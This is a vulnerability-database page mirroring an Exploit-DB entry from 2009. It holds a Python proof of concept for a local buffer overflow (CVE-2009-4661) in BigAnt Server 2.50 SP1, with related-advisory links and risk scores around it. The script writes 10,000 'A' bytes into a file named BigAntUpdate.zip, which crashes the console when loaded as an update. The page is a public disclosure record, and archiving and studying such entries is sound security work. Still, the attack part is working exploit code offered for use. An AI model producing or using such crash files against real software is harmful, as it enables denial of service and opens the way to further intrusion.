Lucene search
+L

BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)

🗓️ 16 Sep 2009 00:00:00Reported by Dr_IDEType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

BigAnt Server 2.50 SP1 local buffer overflow Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4661
16 Sep 200900:00
circl
cve
CVE
CVE-2009-4661
3 Mar 201020:00
cve
cvelist
Cvelist
CVE-2009-4661
3 Mar 201020:00
cvelist
exploitdb
Exploit DB
BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)
21 Sep 200900:00
exploitdb
euvd
EUVD
EUVD-2009-4626
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4661
3 Mar 201020:30
nvd
prion
Prion
Buffer overflow
3 Mar 201020:30
prion
#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.02112
30